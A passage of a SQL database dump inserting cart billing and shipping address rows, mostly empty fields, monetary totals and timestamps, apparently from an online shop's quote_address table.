(1837, 1102, '2026-04-21 09:34:53', '2026-04-21 09:34:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1838, 1102, '2026-04-21 09:34:53', '2026-04-21 09:34:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1839, 1103, '2026-04-21 09:35:02', '2026-04-21 09:35:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1840, 1103, '2026-04-21 09:35:02', '2026-04-21 09:35:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1841, 1104, '2026-04-21 10:46:43', '2026-04-21 10:46:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1842, 1104, '2026-04-21 10:46:43', '2026-04-21 10:46:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1843, 1105, '2026-04-21 12:29:25', '2026-04-21 12:29:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1844, 1105, '2026-04-21 12:29:25', '2026-04-21 12:29:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1845, 1106, '2026-04-21 12:29:35', '2026-04-21 12:29:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1846, 1106, '2026-04-21 12:29:35', '2026-04-21 12:29:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1847, 1107, '2026-04-21 12:29:44', '2026-04-21 12:29:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1848, 1107, '2026-04-21 12:29:44', '2026-04-21 12:29:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1849, 1108, '2026-04-21 12:29:47', '2026-04-21 12:29:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1850, 1108, '2026-04-21 12:29:47', '2026-04-21 12:29:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1851, 1109, '2026-04-21 12:29:49', '2026-04-21 12:29:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1852, 1109, '2026-04-21 12:29:49', '2026-04-21 12:29:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1853, 1110, '2026-04-21 12:29:53', '2026-04-21 12:29:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1854, 1110, '2026-04-21 12:29:53', '2026-04-21 12:29:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1855, 1111, '2026-04-21 12:30:02', '2026-04-21 12:30:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1856, 1111, '2026-04-21 12:30:02', '2026-04-21 12:30:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1857, 1112, '2026-04-21 12:30:11', '2026-04-21 12:30:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1858, 1112, '2026-04-21 12:30:11', '2026-04-21 12:30:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1859, 1113, '2026-04-21 12:30:14', '2026-04-21 12:30:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1860, 1113, '2026-04-21 12:30:14', '2026-04-21 12:30:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1861, 1114, '2026-04-21 12:30:21', '2026-04-21 12:30:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1862, 1114, '2026-04-21 12:30:21', '2026-04-21 12:30:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1863, 1115, '2026-04-21 12:30:30', '2026-04-21 12:30:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1864, 1115, '2026-04-21 12:30:30', '2026-04-21 12:30:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1865, 1116, '2026-04-21 12:40:33', '2026-04-21 12:40:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1866, 1116, '2026-04-21 12:40:33', '2026-04-21 12:40:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1867, 1117, '2026-04-21 12:57:32', '2026-04-21 12:57:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1868, 1117, '2026-04-21 12:57:32', '2026-04-21 12:57:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1869, 1118, '2026-04-21 14:27:27', '2026-04-21 14:27:27', 135, 0, NULL, 'billing', 'm.ohu.qu.b.4.1.1@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1870, 1118, '2026-04-21 14:27:27', '2026-04-21 14:27:27', 135, 0, NULL, 'shipping', 'm.ohu.qu.b.4.1.1@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1871, 1119, '2026-04-21 20:20:37', '2026-04-21 20:20:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1872, 1119, '2026-04-21 20:20:37', '2026-04-21 20:20:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1873, 1120, '2026-04-21 22:02:28', '2026-04-21 22:02:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1874, 1120, '2026-04-21 22:02:28', '2026-04-21 22:02:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1875, 1121, '2026-04-22 03:16:20', '2026-04-22 03:16:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1876, 1121, '2026-04-22 03:16:20', '2026-04-22 03:16:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1877, 1122, '2026-04-22 07:36:00', '2026-04-22 07:36:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1878, 1122, '2026-04-22 07:36:01', '2026-04-22 07:36:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1879, 1123, '2026-04-22 10:34:33', '2026-04-22 10:34:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1880, 1123, '2026-04-22 10:34:33', '2026-04-22 10:34:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
